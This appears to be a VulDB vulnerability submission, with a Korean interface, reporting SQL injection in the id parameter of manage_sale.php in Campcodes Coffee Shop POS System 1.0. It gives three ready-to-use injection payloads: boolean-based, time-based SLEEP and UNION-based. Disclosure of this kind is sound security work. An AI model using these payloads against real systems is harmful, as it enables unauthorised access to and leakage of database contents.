| 제목 | SQL injection vulnerability exists in Coffee Shop POS System |
|---|
| 설명 | SQL injection vulnerability exists in id parameter of /admin/sales/manage_sale.php file of Coffee Shop POS System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit /admin/index.php and page parameter is ‘sales/manage_sale’,it will include /admin/sales/manage_sale.php,and id parameter can do sql injection.
Payload:
page=sales/manage_sale&id=1' AND 2444=2444 AND 'qAvo'='qAvo
or
page=sales/manage_sale&id=1' AND (SELECT 6486 FROM (SELECT(SLEEP(5)))HZnv) AND 'ArbR'='ArbR
or
page=sales/manage_sale&id=-8111' UNION ALL SELECT CONCAT(0x71786a6a71,0x45494349585a536871635370785854596852795342755942727a7253667850484c476453585a6a73,0x7162786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| 원천 | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Coffee%20Shop%20POS%20System/Coffee%20Shop%20POS%20System%20-%20vuln%206.pdf |
|---|
| 사용자 | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| 제출 | 2023. 04. 19. PM 12:15 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 21. AM 08:29 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 226979 [Campcodes Coffee Shop POS System 1.0 manage_sale.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|